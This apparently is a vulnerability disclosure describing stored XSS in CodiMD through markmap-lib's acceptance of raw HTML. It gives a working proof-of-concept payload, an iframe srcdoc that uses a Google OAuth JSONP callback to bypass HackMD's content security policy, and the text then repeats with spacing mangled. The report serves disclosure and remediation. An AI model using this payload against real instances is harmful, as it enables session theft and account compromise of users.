I have raised an issue to markmap about this vulnerability
Root cause
Codimd uses markmap-lib, as documented here. However, markmap-lib allows for arbitrary HTML to be specified, thanks to the following markdown-it
https://github.com/markmap/markmap/blob/205367a24603dc187f67da1658940c6cade20dce/packages/markmap-lib/src/markdown-it.ts#L7-L11
Proof-of-Concept
The proof of concept for this vulnerability can be found here
Steps to Reproduce
Step 1: Create a note with the following content. The iframe has a srcdoc that bypasses the HackMD CSP
```markmap
- xss: <iframe srcdoc="<script src='https://accounts.google.com/o/oauth2/revoke?callback=alert(window.origin)'></script>"></iframe>
```
Step 2: View it and trigger the XSS
Impact
This stored XSS can lead to a account compromise through cookie exfiltration, also the attackers can perform any actions on behalf of the user
Root cause
Codimd uses markmap-lib, as documented here. However,
markmap-liballows for arbitrary HTML to be specified, thanks to the followingmarkdown-ithttps://github.com/markmap/markmap/blob/205367a24603dc187f67da1658940c6cade20dce/packages/markmap-lib/src/markdown-it.ts#L7-L11
Proof-of-Concept
The proof of concept for this vulnerability can be found here
Steps to Reproduce
Step 1: Create a note with the following content. The
iframehas asrcdocthat bypasses the HackMD CSPStep 2: View it and trigger the XSS
Impact
This stored XSS can lead to a account compromise through cookie exfiltration, also the attackers can perform any actions on behalf of the user